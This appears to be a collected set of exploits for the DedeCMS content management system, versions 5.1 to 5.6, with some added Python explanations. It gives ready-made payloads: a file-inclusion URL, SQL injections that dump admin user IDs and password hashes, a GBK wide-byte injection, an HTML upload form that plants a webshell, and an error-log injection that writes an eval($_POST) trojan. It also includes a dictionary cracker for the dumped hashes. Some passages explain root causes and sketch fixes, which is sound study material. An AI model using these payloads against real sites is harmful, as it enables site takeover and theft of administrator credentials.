DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

(`%23@__` decodes to `#@__`, DedeCMS's table-prefix placeholder, which the CMS rewrites to the configured prefix, normally `dede_`.)

The password column holds the 32-character MD5 with the first 5 and last 7 characters removed, i.e. a 20-character MD5 fragment. To turn that into the common 16-character MD5, drop 3 characters from the front and 1 from the back.
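As an added example (not code from the original post or from DedeCMS), the following Python reproduces that derivation and shows what you do with a dumped `pwd` value: convert it, and check guesses against it. The sample admin password and wordlist are constructed here.

```python
import hashlib


def md5_hex(password: str) -> str:
    """Full 32-char hex MD5 of a password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_stored_hash(password: str) -> str:
    """The 20-char value DedeCMS keeps in the admin table's pwd column:
    the 32-char MD5 with 5 leading and 7 trailing chars removed (md5[5:25])."""
    return md5_hex(password)[5:25]


def stored20_to_md5_16(h20: str) -> str:
    """Convert the 20-char stored value to the common 16-char MD5 (md5[8:24]):
    drop 3 chars from the front and 1 from the back, as the post describes."""
    if len(h20) != 20:
        raise ValueError("expected a 20-char DedeCMS hash, got %d chars" % len(h20))
    return h20[3:19]


def check_password(candidate: str, stored: str) -> bool:
    """Test a guess against either the 20-char or the 16-char stored form."""
    full = md5_hex(candidate)
    stored = stored.strip().lower()
    if len(stored) == 20:
        return full[5:25] == stored
    if len(stored) == 16:
        return full[8:24] == stored
    raise ValueError("unsupported hash length %d" % len(stored))


def crack(stored: str, wordlist):
    """Offline dictionary attack against a dumped hash; returns the password or None."""
    for word in wordlist:
        if check_password(word, stored):
            return word
    return None


if __name__ == "__main__":
    # Constructed sample: an admin row whose password is "admin" (not data from the post).
    dumped = dede_stored_hash("admin")
    print("stored 20-char:", dumped)
    print("16-char MD5   :", stored20_to_md5_16(dumped))
    print("cracked       :", crack(dumped, ["123456", "password", "admin"]))
```

Because the stored value is just a window into an unsalted MD5, any MD5 wordlist or rainbow table works directly: compute the MD5 of each candidate and compare `[5:25]` (or `[8:24]` for the 16-char form) rather than trying to "reverse" the fragment.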
DedeCMS 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS select_soft_post.php uninitialized page-variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<!-- With register_globals=on these hidden fields populate the script's uninitialized config variables -->
<input type="hidden" name="activepath" value="/data/cache/" />
<input type="hidden" name="cfg_basedir" value="../../" />
<input type="hidden" name="cfg_imgtype" value="php" />
<input type="hidden" name="cfg_not_allowall" value="txt" />
<input type="hidden" name="cfg_softtype" value="php" />
<input type="hidden" name="cfg_mediatype" value="php" />
<input type="hidden" name="f" value="form1.enclosure" />
<input type="hidden" name="job" value="upload" />
<input type="hidden" name="newname" value="fly.php" />
Select U Shell <input type="file" name="uploadfile" size="25" />
<input type="submit" name="sb1" value="Submit" />
</form>
<br />It's just an exploit for the bug in Dedecms V55...<br />
Needs register_globals = on...<br />
Have fun, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS 5.3 – 5.5 plus/digg_frame.php injection vulnerability

This exploits a MySQL error raised by a numeric overflow in a field value, combined with DedeCMS recording database error messages into a PHP file whose header is not validated.

1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit http://www.abc.com/data/mysql_error_trace.php. Seeing the following output proves the injection worked:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

(The leading `int(3)` is the output of the injected var_dump(3): the `*/` in `mid` closed the comment that wraps the logged entry, so everything after it up to `?>` ran as PHP when the trace file was requested, and the rest of the entry was printed as plain text.)

3. Open test.html from dede.rar. Note that the form action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking Submit, seeing the same output as in step 2 means the trojan file was uploaded successfully.
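Added example, not code from the original post or from DedeCMS: a Python model of why the `*/` in `mid` turns the error trace file into a webshell, next to a hardened log writer. It assumes the trace file wraps each entry in a PHP block comment (the layout the `*/ ?>` tail in step 2 implies); the request URI is constructed here and the `id` parameter name is an assumption, while the error and SQL lines are the ones shown in step 2.

```python
PAYLOAD_MID = "*/eval($_POST[x]);var_dump(3);?>"  # the mid= value from step 1
TRIGGER_ID = "1024e1024"  # double literal out of MySQL's range: the query fails, so an error is logged


def vulnerable_trace_entry(request_uri: str, error: str, sql: str) -> str:
    """Assumed layout of data/mysql_error_trace.php: the entry is written verbatim
    inside a PHP block comment, so the file is still valid PHP when requested."""
    return "<?php /*\nRequest: %s\n%s\nError sql: %s\n*/ ?>\n" % (request_uri, error, sql)


def hardened_trace_entry(request_uri: str, error: str, sql: str) -> str:
    """Hardened form: plain text meant for a .log file outside the web root, with
    PHP tags and comment terminators neutralised in case it is ever parsed as PHP."""
    def neutralise(s: str) -> str:
        return s.replace("<?", "<_?").replace("?>", "?_>").replace("*/", "*_/")
    return "Request: %s\n%s\nError sql: %s\n\n" % tuple(neutralise(x) for x in (request_uri, error, sql))


def executable_php(src: str) -> str:
    """Return the code the PHP engine would run from `src`: text inside <?php ... ?>
    that is not inside a /* */ block comment or a // or # line comment.
    String literals are not modelled; that is enough for the log layout above."""
    code = []
    i, n, in_php = 0, len(src), False
    while i < n:
        if not in_php:
            j = src.find("<?php", i)
            if j < 0:
                break
            i, in_php = j + 5, True
        elif src.startswith("?>", i):
            in_php, i = False, i + 2
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)
            i = n if j < 0 else j + 2
        elif src.startswith("//", i) or src.startswith("#", i):
            j = src.find("\n", i)
            i = n if j < 0 else j
        else:
            code.append(src[i])
            i += 1
    return "".join(code).strip()


def build_entry(writer):
    """Feed the request from step 1 through a log writer. The request URI is
    constructed here and the `id` parameter name is an assumption; the error and
    SQL text are the lines shown in step 2."""
    uri = "/plus/digg_frame.php?id=%s&mid=%s" % (TRIGGER_ID, PAYLOAD_MID)
    error = "Error: Illegal double '%s' value found during parsing" % TRIGGER_ID
    sql = "Select goodpost,badpost,scores From `gxeduw_archives` where id=%s limit 0,1;" % TRIGGER_ID
    return writer(uri, error, sql)


if __name__ == "__main__":
    print("vulnerable log executes:", repr(executable_php(build_entry(vulnerable_trace_entry))))
    print("hardened log executes:  ", repr(executable_php(build_entry(hardened_trace_entry))))
```

The two defences the hardened writer models are independent: keep the trace somewhere the web server will not execute it (a .log outside the document root), and never let request data land inside PHP syntax unescaped. Either one alone stops this chain; DedeCMS had neither.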
DedeCMS plus/infosearch.php injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
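The `%cf'` at the start of that payload is a wide-byte (GBK) injection: byte-oriented escaping such as addslashes() or magic_quotes_gpc turns `'` into `\'` (bytes CF 5C 27), and a GBK connection then reads CF 5C as one two-byte character, leaving the quote unescaped. As an added example, not code from the original post or from DedeCMS, the Python below models that escaping followed by charset decoding, and a charset-aware escaper that does not have the problem. The payloads and the query stand-in are constructed here.

```python
def addslashes(data: bytes) -> bytes:
    """PHP addslashes()/magic_quotes_gpc on raw bytes: put a backslash before
    ' " \\ and NUL. It knows nothing about multi-byte character sets."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_mysql_sees(raw_param: bytes, connection_charset: str) -> str:
    """Escape the way the PHP layer does, then decode the bytes the way a MySQL
    connection using `connection_charset` will when it parses the query."""
    return addslashes(raw_param).decode(connection_charset, errors="replace")


def escape_charset_aware(raw_param: bytes, connection_charset: str) -> str:
    """What mysql_real_escape_string() does once mysql_set_charset() has told it
    the connection charset: decode first, escape per character, so no escape
    byte can be swallowed into a multi-byte character."""
    text = raw_param.decode(connection_charset, errors="replace")
    return "".join("\\" + ch if ch in "'\"\\\0" else ch for ch in text)


def has_unescaped_quote(s: str) -> bool:
    """True if a single quote in `s` is not preceded by a backslash, i.e. the
    parameter would terminate the SQL string literal it was placed in."""
    prev = ""
    for ch in s:
        if ch == "'" and prev != "\\":
            return True
        prev = ch
    return False


# Constructed payloads (the second is the %cf' trick from the URL above).
PLAIN = b"' union select 1,2,userid,4,pwd,6 from dede_admin/*"
WIDE = b"\xcf' union select 1,2,userid,4,pwd,6 from dede_admin/*"


def injection_breaks_out(param: bytes, charset: str, escaper=as_mysql_sees) -> bool:
    """Does `param` escape the quoted literal under the given escaper and charset?"""
    return has_unescaped_quote(escaper(param, charset))


if __name__ == "__main__":
    for name, param in (("plain", PLAIN), ("wide-byte", WIDE)):
        for cs in ("gbk", "utf-8"):
            print("%-9s %-6s addslashes: %-5s charset-aware: %s" % (
                name, cs, injection_breaks_out(param, cs),
                injection_breaks_out(param, cs, escape_charset_aware)))
```

The fix is not to strip 0xCF bytes; it is to escape with knowledge of the connection charset (mysql_set_charset() before mysql_real_escape_string(), or prepared statements), or to run the connection in a charset such as utf8 where 0x5C can never be a trailing byte.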